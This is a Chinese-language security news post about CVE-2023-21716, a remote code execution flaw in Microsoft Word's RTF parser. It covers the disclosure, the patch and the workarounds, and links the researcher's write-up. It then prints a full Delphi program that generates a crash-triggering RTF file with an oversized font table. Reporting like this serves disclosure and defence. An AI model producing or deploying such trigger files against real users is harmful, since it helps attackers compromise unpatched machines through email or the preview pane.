安全人员公开CVE-2023-21716漏洞POC
CVE-2023-21716的PoC利用现已公开,这是Microsoft Word中的一个关键RCE漏洞,可在用户预览特制RTF文档时被利用。预计这次公开会引发更大规模的攻击事件。

微软上个月发布了针对该漏洞的补丁,该漏洞会影响各种MS Office和SharePoint版本、Microsoft 365企业应用程序和其他产品。
CVE-2023-21716 和 PoC 利用
CVE-2023-21716由安全研究员Joshua J.Drake于2022年11月发现并私下披露。
这是Microsoft Word的RTF解析器中的一个堆损坏漏洞,如果被触发,攻击者可以利用受害者的权限实现远程代码执行。该缺陷不需要事先进行身份验证:攻击者只需通过电子邮件向受害者发送诱导RTF文件即可。
“Microsoft Office 2010及更高版本使用受保护的视图来限制从不受信任来源获取的恶意文档造成的损害。受保护的视图在该漏洞出现时生效,因此需要额外的沙箱逃逸漏洞才能获得全部权限,”德雷克在他发送给微软的咨询/报告中指出(现已发布)。
该报告还包括一个概念验证PoC(Python脚本),可用于创建将触发漏洞的文件。
在补丁随附的安全公告中,微软确认预览窗格是一个攻击媒介。虽然修补易受攻击的产品是首选,但该公司还提供了可能的解决方法指南,其中包括:
- 配置Microsoft Outlook以阅读所有纯文本格式的标准邮件
- 使用Microsoft Office文件阻止策略防止Office打开来自未知或不受信任来源的RTF文档。
POC地址:https://qoop.org/publications/cve-2023-21716-rtf-fonttbl.md
下面是delphi版本POC实现
program Project1;
{$APPTYPE CONSOLE}
{$R *.res}
uses
System.SysUtils,
System.Classes;
var
Poc:TStringList;
i:Integer;
begin
try
Poc := TStringList.Create;
Poc.Add('{\rtf1{');
Poc.Add('{\fonttbl');
for i := 1 to 32761 do
begin
Poc.Add(Format('{\f%dA;}',[i]));
end;
Poc.Add('}');
Poc.Add('{\rtlch it didnt crash?? no calc?! BOO!!!}');
Poc.Add('}}');
Poc.SaveToFile('poc.rtf');
{ TODO -oUser -cConsole Main : Insert code here }
except
on E: Exception do
Writeln(E.ClassName, ': ', E.Message);
end;
end.
测试文件:
本文来源于Lonely Blog -全球网络安全资讯平台, 转载请注明出处: https://blog.wuhao13.xin/4727.html